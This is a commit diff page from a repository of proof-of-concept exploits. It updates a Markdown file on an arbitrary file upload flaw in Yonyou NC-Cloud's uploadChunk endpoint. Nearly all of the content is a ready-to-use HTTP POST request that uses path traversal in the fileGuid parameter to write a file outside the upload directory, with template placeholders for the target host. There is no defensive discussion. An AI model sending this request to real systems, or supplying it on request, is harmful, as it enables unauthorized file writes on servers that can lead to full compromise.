admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update 用友NC-Cloud uploadChunk 任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-11-24 19:49:58 +08:00 committed by GitHub
parent 38d1f1e47a
commit 2bf81d4807
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
用友NC-Cloud uploadChunk 任意文件上传漏洞.md
View File

@ -7,12 +7,16 @@ app="用友-NC-Cloud"
## POC ## POC
``` ```
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1 POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: multipart/form-data; Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
--024ff46f71634a1c9bf8ec5820c26fa9--
Content-Disposition: form-data; name="file"; filename="test.txt" Content-Disposition: form-data; name="file"; filename="test.txt"
{{randstr}}
1123213
--024ff46f71634a1c9bf8ec5820c26fa9-- --024ff46f71634a1c9bf8ec5820c26fa9--
``` ```